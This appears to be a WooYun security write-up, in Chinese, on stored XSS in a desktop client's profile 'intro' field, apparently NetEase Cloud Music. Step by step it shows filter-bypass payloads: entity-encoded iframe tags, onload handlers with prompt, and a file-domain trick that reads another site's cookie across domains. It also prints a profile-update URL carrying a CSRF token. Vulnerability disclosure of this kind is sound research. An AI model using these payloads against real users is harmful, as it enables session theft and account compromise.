WooYun.org

最近搞客户端XSS也积攒了一些经验，所以附上测试流程吧。测试了几个输入点后，在“修改个人资料”－“介绍”处发现了一点异常。
输入：

<a>asd</a>

输出：

<a rel="nofollow">asd</a>

这是个典型的“此地无银三百两的”处理方式。因为在看到程序员对用户输入做了这样的修改之后，就会让人想到。。这个玩意儿肯定在什么地方是当作html来解析的。开始查看别的页面。在朋友这个页面当中，发现介绍中的内容居然被当作html解析了。我这么认为的原因很简单，因为鼠标移动到asd时由于是anchor tag，指针会有变化（在没办法查看源代码的情况下，如果使用复杂的向量，当程序员对用户输入进行了特殊的过滤时，很难判断是没有解析还是被过滤了。）。

接着开始加大向量的复杂度，但尽量不要急着执行js。
输入：

<iframe src=http://baidu.com>

输出：什么都没有，全被移除了。
再看看程序员有没有进行“多余”的解码。
输入:

<iframe src=http://baidu.com>

输出:

<iframe src=http://baidu.com>

看来是有的了。。已经看到加载了我们的iframe，如下图：

现在开始看看能不能执行js？
输入：

<iframe src=http://baidu.com onload=alert(1)>

输出：

<iframe src=http://baidu.com onload=alert(1)>

当我再次切换到朋友页面时，却发现什么都没弹。。莫非是过滤了alert?换成prompt后：

再次弹起来了。不得不说程序员还是很调皮的。现在再确定两样东西。一个是protocol另外一个是user agent。
输入：

<iframe src=http://baidu.com onload=prompt(location.protocol+navigator.userAgent)>

结果：

看样子是safari＋本地域。心想着，这就好玩了，因为safari的file域是可以跨任意域的。接着再改个人资料（这里发现单双引号也被过滤了，所以按照前面的思路编码了一下）：

<iframe name=m src=http://zone.wooyun.org onload=&#34window.open(&#39javascript:prompt(document.cookie)&#39,&#39m&#39)&#34>

结果：

可以看到我们跨域拿到了zone.wooyun.org的cookie。当然对于这个站来说拿cookie也没啥用
，毕竟还是有httponly flag的。所以只是证明一下可行性。然后还有一个问题就是location会泄漏系统用户名。
输入：

<iframe name=m src=http://zone.wooyun.org onload=prompt(location)>

结果：

看到这儿感觉，再来个csrf就完美了。不过抓包发现。update请求还是有个token的：

URL=http://music.163.com/api/user/profile/update?csrf_token=7f3948015b96761e93a4eed426122ca0

搞到这儿思路就断了，也花了我不少时间。所以不想再这个应用上面浪费时间了。